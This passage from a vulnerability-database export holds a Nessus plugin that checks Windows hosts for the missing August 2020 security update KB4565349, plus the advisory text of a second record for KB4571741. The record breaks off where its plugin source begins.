\"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4565349\");\n script_xref(name:\"MSFT\", value:\"MS20-4565349\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4565349: Windows 10 Version 1809 and Windows Server 2019 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565349.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4565349/windows-10-update-kb4565349\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b03d5e5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4565349.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-08\";\nkbs = make_list('4565349');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"08_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4565349])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:02", "description": "The remote Windows host is missing security update 4571741.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571741: Windows 10 Version 1709 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571741.NASL", "href": "https://www.tenable.com/plugins/nessus/139494", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif 